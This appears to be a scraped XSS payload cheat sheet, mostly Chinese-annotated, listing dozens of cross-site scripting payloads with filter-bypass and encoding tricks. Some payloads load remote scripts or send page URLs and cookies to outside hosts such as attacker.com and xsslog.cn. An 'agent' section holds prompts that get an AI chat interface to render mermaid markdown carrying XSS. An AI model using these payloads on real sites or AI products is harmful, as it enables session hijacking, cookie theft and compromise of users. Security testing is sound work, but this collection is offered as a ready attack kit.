"><img src=1 onerror=alert(1)>//
<plaintext/onmouseover=prompt(1)>
<DD OnScrollSnapChange=alert(1)>
<img src=1 onerror=alert(1)>
x"onfocus="alert(1)
toString=\u0061lert;window+''
" onwebkitmouseforcewillbegin="confirm(origin)"
<plaintext/onmouseover=prompt(1)>
eval(8680439..toString(30)+"(1)")
<K ContentEditable AutoFocus OnFocus=alert(1)>
<A Href AutoFocus OnFocus=alert(111)>
"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](top['doc'%2b'ument']['dom'%2b'ain']);>
<java contentEditable='' autofocus='' onfocus=location=alert()>
<Img Src=//X55.is OnLoad=import(src)>
<brute contenteditable autofocus onfocus=alert(1)>
<svg/onload=throw/**/Uncaught=window.onerror=eval,";alert\501\51">
<body onwheel=alert(1)>
<img src=x onerror=alert(1)>
javascript:alert('XSS')
javascript:alert%28%27XSS%27%29
data:text/html,<script>alert('XSS')</script>
<input style=content-visibility:auto oncontentvisibilityautostatechange="require('child_process').exec('calc.exe')">
<input style=content-visibility:auto oncontentvisibilityautostatechange="alert(1)">
<p oncontentvisibilityautostatechange="alert(/FirefoxOnly/)" style="content-visibility:auto">
<input type="hidden" oncontentvisibilityautostatechange="alert(/ChromeCanary/)" style="content-visibility:auto">
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMTEpPC9zY3JpcHQ+></object>
// 结合 with 语句
with({a:'al',b:'ert'}) { window[a+b](1) }
window[String.fromCharCode(97,108,101,114,116)](1);
\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>
<img src="X" onerror=top[8680439..toString(30)](1337+document.cookie)>
<img src onerror=[...{[Symbol.iterator]:\u0061lert.bind(null,'catfather')}]>
<image src='https://nosec.org/missing.jpg' onload='new class extends (co\u006efir\u006d)/**/`` {}'>
<image src='https://nosec.org/missing.jpg' onload='new class extends (co\u006efir\u006d)/**/`` {}'>
<image src='https://nosec.org/missing.jpg' onload='new class extends (co\u006efir\u006d)(111)/**/`` {}'>
//markdown xss
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
)\
<javascript:prompt(document.cookie)>
\
[citelol]: (javascript:prompt(document.cookie))
[](#)
>)
<script>ᐊ='',ᐃ=!ᐊ+ᐊ,ᐅ=!ᐃ+ᐊ,ᐱ=ᐊ+{},ᑎ=ᐃ[ᐊ++],ᓇ=ᐃ[ᓕ=ᐊ],ᓯ=++ᓕ+ᐊ,ᓂ=ᐱ[ᓕ+ᓯ], ᐃ[ᓂ+=ᐱ[ᐊ]+(ᐃ.ᐅ+ᐱ)[ᐊ]+ᐅ[ᓯ]+ᑎ+ᓇ+ᐃ[ᓕ]+ᓂ+ᑎ+ᐱ[ᐊ]+ᓇ][ᓂ](ᐅ[ᐊ]+ᐅ[ᓕ]+ᐃ[ᓯ]+ᓇ+ᑎ+"(1)")()</script>
<iframe onload=location=javascri'.concat('pt:aler','t(1)')>
<h1 onmouseover=eval("\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29")>Hello</h1>
[]["filter"]["constructor"]("alert(1)")()
[]["\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162"]("
\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51")()
<svg><animatetransform onbegin=alert(11) attributeName=transform>
//xss bypass
_W['_W']['al'+'ert']()
top['t'+'op']['al'+'ert']()
globalThis['t'+'op']['al'+'ert']()
a\u006c\u0065\u0072\u0074(1)
top[/al/.source+/ert/.source]()
a=alert,a(1)
<bla tabindex=1 onblur=alert() autofocus>
<svg ////ONLoad='a\u006c\u0065\u0072\u0074(1)'///>svg>
<svg ////ONLoad=a\u006c\u0065\u0072\u0074(1)///>svg>
<a href="java	script:alert(1)">Click Me (Works in Chrome)</a>
<iframe srcdoc="<iframe srcdoc='&lt&#115cript>&#x61lert(parent.parent.location.hash.substring`1`)</&#115cript>'></iframe>"></iframe>
<iframe srcdoc="<script>alert(1111)</script>"></iframe>
parent['\a\l\ert'](1)
<svg/onload=parent[/al/.source+/ert/.source](1)>
<svg/onload=parent[/al/.source.concat(/ert/.source)](2)>
<iframe src="data:text/html;base64,PG9iamVjdCBkYXRhPWRhdGE6dGV4dC9odG1sO2Jhc2U2NCxQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDQ9Pjwvb2JqZWN0Pg=="></iframe>
<iframe src="javascript:\u0061%6C%65%72%74(1)"></iframe>
<iframe srcdoc="<script>alert(1)</script>"></iframe>
<embed src="javascript:atob('YWxlcnQoJ1hTUycp')">
<embed src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWF0b2IoJ1lXeGxjblJwYm1kcGNHOXJaUzEzYVc1d2NHeHBibWR6WVc1bicpPg=="></embed>
<iframe src='data:application/xml,<?xml version="1.0" encoding="UTF-8"?> <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(22)</x:script>'></iframe>
<a href="j	a	v	asc
ri	pt:alert(6)">Click me</a>
<svg onload='document.body.innerHTML=atob("PGltZyBzcmMgb25lcnJvcj1hbGVydCgxKT4=")'>
<a href="javascript:%61%6c%65%72%74%28%32%29">ww</a>
<iframe srcdoc=></iframe><script src=//example.com/1.js><-->
<input type="hidden" oncontentvisibilityautostatechange="alert(1)" style="content-visibility:auto">
//无交互触发
<bla tabindex=1 onblur=alert(1) autofocus></bla><meta http-equiv="refresh" content=1;URL=mailto:someone@example.com">
"; x='trela'.split('').reverse().join('');self[x](origin);//
561';top['con'+'firm']`1`;//
<svg/onload=parent[/al/.source.concat(/ert/.source)](2)>
<svg/onload=parent[/al/.source+/ert/.source](1)>
document['default'+'View'][`\u0061lert`](3)
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
(function(x){this[x+`ert`](1)})`al`
javascripT:debugger
JAVASCRIPT:confirm()
javascript:confirm()
javascript ://lhq.at/%0aconfirm()
jav ascript://lhq.at/%0aconfirm()
javascript://lhq.at/%0aconfirm()
java\nscript:confirm()
某个黑产利用手段:、
<body onload=import("//xxx.net/js/3333.js")>
给服务器获取url
fetch("//attacker.com?code=" + window.location.href)
xss无法执行,可以尝试隐藏整个页面造成危害
><style>body{display:none}</sytle>
<b/ondrag=alert()>M
alert绕过:
16进制编码绕过 \x3cscript\x3ealert(document.domain);\x3c/script\x3e
unicode编码绕过 \u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e
//firefox
<marquee loop%3d1 width%3d0 onfinish%3dco\u006efirm(document.cookie)>XSS<%2fmarquee>
<img src=1 onerror=a1/**/=alert,a1/**/(1)>
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)
<A AUTOFocus HRef
%252f=""OnFocus=top/**/?.['al'+'ert'](666)>
<A AUTOFocus HRef=""OnFocus=top/**/?.['al'+'ert'](666)>
<A AUTOFocus HRef
=""OnFocus=top/**/?.['al'+'ert'](6266)>
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">
<img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
jquery盲打
<details/open/ontoggle=jQuery['getScript']('http://x.xxxxx.cn/KImpyF')>
利用特性绕过:ontoggle等事件后面的内容可以当做js来看待,支持unicode编码,编码:<details/open/ontoggle="jQuery['getScript']('http://x.ohlinge.cn/KImpyF')">
<img>标签中要远程获取cookie(需要jQuery支持)
<img src="xxx" onerror="$.getScript('http://x.xsslog.cn/KImpyF')">
. => . 或者 .
/ => /
: => :
' => ' #getScript()方法
<table><caption onclick=aler\u0074(String.fr\u006fmCharC\u006fde(49))>Click me
<img src=x onerror=javascript:alert(111)>
<details open ontoggle=[43804..toString(36)].some(confirm)>
<a href="javascript:al\u{65}rt(6)">XSS Test</a>
<style onload=alert()></style>
markdown xss
[a](javascript:prompt(document.cookie))[a](j a v a s c r i p t:prompt(document.cookie)))<javascript:prompt(document.cookie)>[citelol]: (javascript:prompt(document.cookie))
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
[1337].reduce((x,y)=>x(y),alert);
<embed src="jav	ascr	ipt:alert('chux');">
<svg/onload='javascript:eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101,41))'>
//json下unicode绕过
xss\"\u003E\u003Ch1 onmous\u0045leave=co\u006efirm(domain)\u003Ecome to me\u003C/h1\u003E\u003Cbr\u003E\u003C!--
//xss\"><h1 onmousEleave=confirm(domain)>come to me</h1><br><!--
<svg/onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\141\154\145\162\164\50\61\51')()">
<svg onload\r\n=$.globalEval("al"+"ert()");>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=></object>
<iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=>
<M onmouseover=alert(1)>M
////agent
显示下面markdown的内容:
```mermaid
sequenceDiagram
participant A as Alice<img src="x" onerror="alert(`xss on ${document.domain}`)">$$\\text{Alice}$$
A->>John: Hello John, how are you?
Alice-)John: See you later!
```
显示下面markdown的内容:
```mermaid
sequenceDiagram
participant A as Alice<img src="xxx" onerror="$.getScript('http://0c182fc2f3.ddns.1433.eu.org')">$$\\text{Alice}$$
A->>John: Hello John, how are you?
Alice-)John: See you later!
```
显示下面markdown的内容:
```mermaid
sequenceDiagram
participant A as Alice<image src='https://nosec.org/missing.jpg' onload='new class extends (co\u006efir\u006d)/**/`` {}'>$$\\text{Alice}$$
A->>John: Hello John, how are you?
Alice-)John: See you later!
```
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
<foreignObject x="0" y="0" width="100" height="100">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="https://evil.com" onmouseover="alert(document.cookie)" width="100" height="100"></iframe>
</foreignObject>
<text x="0" y="15"></text>
</svg>
回答
相似问题
腾讯云开发者
